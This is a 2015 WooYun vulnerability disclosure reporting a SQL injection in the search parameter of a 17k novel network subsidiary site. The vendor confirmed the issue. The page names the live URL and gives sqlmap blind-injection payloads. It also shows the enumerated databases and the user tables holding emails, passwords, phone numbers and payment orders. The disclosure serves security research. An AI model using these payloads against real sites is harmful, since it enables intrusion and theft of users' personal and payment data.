当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0140578

漏洞标题:17k小说网旗下某网站存在SQL注入,可导致泄露订单信息

相关厂商:17k小说网

漏洞作者: 路人甲

提交时间:2015-09-12 09:22

修复时间:2015-10-31 10:12

公开时间:2015-10-31 10:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-12: 细节已通知厂商并且等待厂商处理中
2015-09-16: 厂商已经确认,细节仅向厂商公开
2015-09-26: 细节向核心白帽子及相关领域专家公开
2015-10-06: 细节向普通白帽子公开
2015-10-16: 细节向实习白帽子公开
2015-10-31: 细节向公众公开

简要描述:

rt

详细说明:

http://ssqj.qiye.ikanshu.cn/
搜索处

Snap132.jpg


抓包
注入点

http://ssqj.qiye.ikanshu.cn/org!bookList.xhtml?qiyeId=4&searchKey=a*


sqlmap identified the following injection points with a total of 70 HTTP(s) requests:
---
Place: URI
Parameter: #1*
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://ssqj.qiye.ikanshu.cn:80/org!bookList.xhtml?qiyeId=4&searchKey=a%' AND 8528=8528 AND '%'='
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: http://ssqj.qiye.ikanshu.cn:80/org!bookList.xhtml?qiyeId=4&searchKey=a%' AND SLEEP(5) AND '%'='
---
web application technology: JSP
back-end DBMS: MySQL 5.0.11


数据库

web application technology: JSP
back-end DBMS: MySQL 5.0.11
available databases [19]:
[*] ads
[*] banquan
[*] ca_web_pay
[*] cdps
[*] client_user_center
[*] desay
[*] information_schema
[*] qiye
[*] resource_auth
[*] resource_process
[*] skymobi_1
[*] skymobi_2
[*] skymobi_3
[*] skymobi_4
[*] skymobi_5
[*] test
[*] wap_17k
[*] xinhua
[*] zentaotask


当前库

current database:    'qiye'


数据量

Database: qiye
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| bookchaptercontent | 645223  |
| bookchapter        | 645214  |
| pv_log             | 126977  |
| qiye_book          | 55327   |
| bookview           | 55034   |
| bookvolume         | 46820   |
| qiye_book_bk       | 19146   |
| book               | 7470    |
| area               | 3511    |
| tmp_id             | 3017    |
| special_book       | 2430    |
| qikan_data         | 2119    |
| `user`             | 1836    |
| doc                | 676     |
| read_history       | 527     |
| data_category      | 387     |
| special_book_1211  | 360     |
| special_book_bk    | 250     |
| news               | 170     |
| fav_history        | 137     |
| qikan              | 79      |
| zan_history        | 77      |
| activity           | 61      |
| comment            | 53      |
| user_amountlog     | 41      |
| fav_doc_history    | 40      |
| data_authorized    | 33      |
| user_feedback      | 32      |
| feeduser           | 29      |
| bookcategory       | 28      |
| comment_hd         | 24      |
| qiye               | 23      |
| special            | 11      |
| activity_winner    | 5       |
| user_amount        | 4       |
| book_off           | 1       |
+--------------------+---------+


user的字段

Database: qiye
Table: user
[13 columns]
+-----------------+--------------+
| Column          | Type         |
+-----------------+--------------+
| create_date     | datetime     |
| email           | varchar(255) |
| id              | int(11)      |
| info            | varchar(255) |
| last_login_time | datetime     |
| logo            | varchar(200) |
| name            | varchar(200) |
| nick_name       | varchar(100) |
| password        | varchar(50)  |
| qiye_id         | int(11)      |
| status          | smallint(3)  |
| tel             | varchar(50)  |
| update_date     | datetime     |
+-----------------+--------------+

漏洞证明:

可以跨库
wap_17k

Database: wap_17k
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| bookcomment        | 79887   |
| paylog             | 56624   |
| yeepayorder        | 20874   |
| yeepayresponse     | 20212   |
| useramountlog      | 4332    |
| userbookmark       | 3980    |
| `user`             | 3425    |
| useramount         | 3196    |
| userbookchapterlog | 1291    |
| feedback           | 620     |
| room_msg           | 126     |
| cmsbook            | 53      |
| cmscategory        | 11      |
| adminuser          | 6       |
+--------------------+---------+


yeepayorder 疑似订单信息

Database: wap_17k
Table: user
[16 columns]
+---------------+--------------+
| Column        | Type         |
+---------------+--------------+
| domain        | varchar(50)  |
| age           | int(5)       |
| birthDate     | date         |
| email         | varchar(255) |
| hobby         | varchar(255) |
| id            | int(11)      |
| lastLoginDate | datetime     |
| loginTimes    | int(11)      |
| logoImg       | varchar(255) |
| mobile        | varchar(20)  |
| nickName      | varchar(255) |
| password      | varchar(16)  |
| qq            | varchar(30)  |
| regTime       | datetime     |
| sex           | tinyint(2)   |
| share         | tinyint(1)   |
+---------------+--------------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-09-16 10:11

厂商回复:

十分感谢您对17K网站的关注,祝您工作愉快!

最新状态:

暂无

漏洞评价:

评论